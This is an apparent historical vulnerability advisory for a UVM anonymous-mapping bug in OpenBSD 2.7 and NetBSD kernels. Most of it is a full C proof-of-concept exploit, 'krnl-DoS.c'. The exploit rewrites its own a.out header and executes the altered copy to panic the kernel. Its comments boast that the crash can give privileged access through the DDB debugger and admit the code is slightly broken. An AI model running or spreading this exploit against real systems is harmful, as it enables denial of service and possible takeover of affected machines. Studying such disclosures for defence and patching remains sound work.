|
Vulnerability kernel Affected OpenBSD 2.7, NetBSD Description Anonymous source found following. UVM is a new virtual memory system developed which is currently used in the OpenBSD. It is significantly better than the traditional MACH based VM. The bug exists in the anonymous mapping code in UVM. This bug allows for any local user (or remote user) to crash the entire OpenBSD system, rendering it completely useless. Once the system has crashed, a local user (with access to the terminal) may in fact hack the system. The system drops into DDB (man it). DDB allows for debugging of the actual kernel. Basically, if the (sz & (PAGE_SIZE-1)) is true, the kernel panic()'s. Here is the xploit: // PUBLIC RELEASE // // krnl-DoS.c by RLoxley of Team Hackphreak (#hackphreak on unet) & SSG // // This exploit is proof of concept code. It exploits the UVM bug in // all OpenBSD kernels. It can also be used to gain god access via // ddb during the crash recovery phase of OpenBSD's security structure. // // Greets: #hackphreak, RootShellHackers, ZSH (#!/bin/zsh), EHAP, // Condemnation, caddis[TESO], Solar Designer, gov-boi, // #darknet, ISS, #conf, Al Hugher, Aleph1, shinex (for porting) // SSG, www.subterrain.net // // PS: The exploit is broke very slightly, so this takes some knowledge // // PUBLIC RELEASE #include <stdio.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <a.out.h> #include <fcntl.h> #include <sys/types.h> #define CRASH_FILE "./f0rKb0mB" extern int errno; int main(int argc, char *argv[]) { struct exec *ehdr; struct stat statbuf; int fd; unsigned char *data; fd = open(argv[0], O_RDONLY); if (fd < 0) { perror("main() : open(argv[0]) "); exit(-1); } if (fstat(fd, &statbuf) < 0) { perror("main() : fstat() "); exit(-1); } data = (unsigned char *) malloc(statbuf.st_size); if (data == NULL) { perror("main() : malloc() "); exit(-1); } if (read(fd, data, statbuf.st_size) <= 0) { puts("main() : read() Failure"); exit(-1); } ehdr = (struct exec *) data; close(fd); unlink(CRASH_FILE); fd = open(CRASH_FILE, O_RDWR | O_CREAT, S_IXUSR); if (fd < 0) { perror("main() : open(CRASH_FILE) "); exit(-1); } ehdr->a_data += 3; if (write(fd, data, statbuf.st_size) < 0) { perror("main() : write() "); exit(-1); } close(fd); if (execlp(CRASH_FILE, NULL) < 0) { perror("main() : execlp() "); exit(-1); } return (0); } Solution There is a patch.